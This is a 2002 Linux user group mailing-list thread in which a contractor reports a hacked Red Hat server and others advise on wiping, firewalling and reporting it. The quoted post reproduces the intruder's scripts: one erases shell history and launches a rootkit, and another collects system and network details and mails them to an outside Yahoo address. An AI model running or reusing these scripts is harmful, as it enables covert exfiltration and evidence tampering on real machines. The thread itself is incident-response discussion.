[lug] i got hacked

Riggs, Rob RRiggs at doubleclick.net
Thu Apr 18 16:01:14 MDT 2002


Feel free to report it to the FBI, but unless this intrusion risks
substantial monetary damages (CC #'s stolen, etc.) you will just be a part
of their crime statistics report. There is nothing that requires that you
save the data, but if you do expect law enforcement to do something about
it, yank the HD and replace it with a new one.

Definitely report the hack to Yahoo! so that they can close or monitor the
email account.

-Rob

-----Original Message-----
From: Scott A. Herod [mailto:herod at interact-tv.com]
Sent: Thursday, April 18, 2002 3:54 PM
To: lug at lug.boulder.co.us
Subject: Re: [lug] i got hacked


Document the intrusion as much as possible.

Unplug the network cable.
Wipe it.
Reload everything.
Set up an iptable or ipchains firewall.
Run said firewall.
Plug the network cable back in.

Contact the FBI.  ( Scary option.  I'd be afraid they might
charge you with destruction of evidence for wiping the box.
That is if they even care to respond. )

Seriously, I have an ipchains firewall on the ppp port on my
home machine.  I see scans within 5 minutes of dialing up
my ISP.  ( I tend to run several services for other machines
on my home network but those all talk through eth0.  Nothing
but udp nameservice and auth is allowed in though my ppp
interface. )

Scott

j davis wrote:
> 
> i have a box at a place i do contract work about 2 days a month.
> today i could not ssh to it. so iwent on site and discoverd i got
> hacked...like a dummy i didnt have tcp wrappers on or a firewall . i think
> they exploited wu-ftpd
> ..i use redhat 7.1 with wu-ftpd 2.6.1-20...i havent got around to
upgrading
> yet.
> anyway here is what i found in /etc/rc3.d/S52remote
> 
> #!/bin/sh
> 
> rm -rf /root/.bash_history
> ln -s /dev/null /root/.bash_history
> 
> cd /dev
> ./ryz -f ./s
> /etc/rc.d/init.d/sshd stop
> cd /
> 
> /usr/bin/trimite
> 
> then here is /usr/bin/trimite
> 
> #!/bin/sh
> 
> echo "* Info : $(uname -a)" >> /tmp/info
> echo "* Hostname : $(hostname -f)" >> /tmp/info
> echo "* IfConfig : $(/sbin/ifconfig | grep inet)" >> /tmp/info
> echo "* Uptime : $(uptime)" >> /tmp/info
> echo "* Cpu Vendor ID : $(cat /proc/cpuinfo|grep vendor_id)" >> /tmp/info
> echo "* Cpu Model : $(cat /proc/cpuinfo|grep model)" >> /tmp/info
> echo "* Cpu Speed: $(cat /proc/cpuinfo|grep MHz)" >> /tmp/info
> echo "* Bogomips: $(cat /proc/cpuinfo|grep bogomips)" >> /tmp/info
> echo "* Spatiu Liber: $(df -h)" >> /tmp/info
> echo "* Ping la Yahoo: $(ping -c3 yahoo.com)" >> /tmp/info
> echo "* Password: $(wc /etc/passwd -l)" >> /tmp/info
> echo "* Portul rootkitului este 25897" >> /tmp/info
> cat /tmp/info | mail -s "root dupa reboot" ryz_ro at yahoo.com
> rm -f /tmp/info
> 
> so, netstat says i have something listening on 25897...what should i do?!
> never benn hacked before....i already turned off ftp and turned on tcp
> wrappers.
> 
> help please
> jd
> 
> _________________________________________________________________
> Get your FREE download of MSN Explorer at
http://explorer.msn.com/intl.asp.
> 
> _______________________________________________
> Web Page:  http://lug.boulder.co.us
> Mailing List: http://lists.lug.boulder.co.us/mailman/listinfo/lug
_______________________________________________
Web Page:  http://lug.boulder.co.us
Mailing List: http://lists.lug.boulder.co.us/mailman/listinfo/lug



More information about the LUG mailing list